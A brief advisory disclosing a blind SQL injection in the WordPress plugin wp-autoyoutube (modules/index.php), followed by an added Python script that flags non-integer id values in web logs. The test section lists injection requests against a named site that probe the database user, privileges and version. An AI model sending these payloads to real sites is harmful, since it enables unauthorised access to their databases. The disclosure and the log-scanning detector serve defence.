Title: WordPress wp-autoyoutube plugin Blind SQL Injection Vulnerability
Author: longrifle0x www.2cto.com
Software: WordPress
http://wordpress.org/extend/plugins/wp-autoyoutube/
Test Tool: SQLMAP
Overview
The WordPress plugin wp-autoyoutube was found to have a blind SQL injection problem.
File:
wp-content/plugins/wp-autoyoutube/modules/index.php
Test method: id=-1; or 1=if
* Test *
http://www.bkjia.com/wp-content/plugins/wp-autoyoutube/modules/index.php [GET] [id=-1] [CURRENT_USER()
http://www.bkjia.com/wp-content/plugins/wp-autoyoutube/modules/index.php [GET] [id=-1] [SELECT (CASE WHEN (SELECT super_priv FROM mysql.user WHERE user = 'none' LIMIT 0, 1) = 'y') THEN 1 ELSE 0 END)
http://www.bkjia.com/wp-content/plugins/wp-autoyoutube/modules/index.php [GET] [id=-1] [MID (VERSION)
wp-content/plugins/wp-autoyoutube/modules/index.php: filter the parameter input on this page.
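
Added example (not part of the original advisory or the plugin's code): a log check a site owner can run to see whether the file above has received requests whose id parameter is not a plain integer. The function name, the access-log format and the rule that a legitimate id is a non-negative integer are assumptions; the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# File named in the advisory; endswith() below also covers sub-directory installs.
VULN_PATH = "/wp-content/plugins/wp-autoyoutube/modules/index.php"
# Assumption: Apache/nginx common or combined log format.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+)[^"]*" (\d{3})')
# Assumption: a legitimate id is a short, non-negative decimal integer.
VALID_ID = re.compile(r"[0-9]{1,10}")

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/plugins/'
    'wp-autoyoutube/modules/index.php?id=7 HTTP/1.1" 200 512',
    '198.51.100.23 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-content/plugins/'
    'wp-autoyoutube/modules/index.php?id=-1%3B%20or%201=if HTTP/1.1" 200 498',
    '198.51.100.23 - - [01/Jan/2024:10:00:06 +0000] "GET /blog/wp-content/plugins/'
    'wp-autoyoutube/modules/index.php?id=-1 HTTP/1.1" 500 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?id=abc HTTP/1.1" 200 1024',
]


def suspicious_requests(lines):
    """Return (client, status, decoded id) for each request to the plugin
    file whose id parameter is not a plain integer."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line in the assumed format
        client, target, status = match.groups()
        url = urlsplit(target)
        if not unquote(url.path).lower().endswith(VULN_PATH):
            continue  # some other page; out of scope for this check
        # parse_qs percent-decodes values; keep_blank_values also reports "id=".
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if not VALID_ID.fullmatch(value):
                hits.append((client, int(status), value))
    return hits


if __name__ == "__main__":
    for client, status, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} status={status} id={value!r}")
```

The same allow-list rule (digits only) is the kind of input filter the advisory asks for on index.php; a hit in the logs means the parameter was sent something other than a number, not that the request succeeded.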